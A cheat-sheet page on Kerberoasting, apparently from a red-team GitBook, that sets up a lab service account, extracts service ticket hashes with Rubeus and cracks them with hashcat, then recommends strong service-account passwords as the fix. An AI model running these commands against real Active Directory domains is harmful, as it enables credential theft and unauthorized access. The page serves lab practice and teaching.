🕺
CheatSheets
🕺
CheatSheets
Introduction
Getting Started With Hacking
VMs on Mac
Windows
Enumeration
Local Privilege Escalation
UAC Bypasses
Persistance
Networking
Active Directory
Offensive Powershell
Enumeration
Lateral Movement
Escalation
ACL Abuse
Kerberoasting
Un-Constrained Delegation
JEA
Persistance
Mimikatz
Alternate Cred Dumps
MSSQL
Defences and Bypasses
Setting Up a Lab
Red Teaming
Phishing Payloads
Cobalt Strike
Metasploit
Linux
Networking
Enumeration
Local Privilege Escalation
Persistance
MySQL
Mainframes
HP Nonstop
IBM z/OS
Cloud
AWS
GCP
Azure
Web App
Tomcat
SQLMap
PHP
Mobile
Android
iOS
Exploit-Dev
Linux
Shellcode
Windows
Powered by GitBook

Kerberoasting

Making the Lab

Set up general ad lab.

Add in a new user called SQLService

Open a cmd on the DC and use:

setspn -a <DC-NAME>/SQLService.<domain>.local:60111 <DOMAIN>\SQLService

You can then verify that the spn can be found:

setspn -T <DOMAIN>.local -Q */*

Abuse

Rubeus is simplest way:

rubeus.exe kerberoast /simple /nowrap

Hashcat to crack the hash:

hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force

Fixing

Could remove SPN from account but would break things.

Real fix is to use a strong password for the service account. This could be changed by:

net user SQLService NewPasswordThatShouldBeStrong
Previous
ACL Abuse
Next
Un-Constrained Delegation
Last updated 6 months ago
Contents
Making the Lab
Abuse
Fixing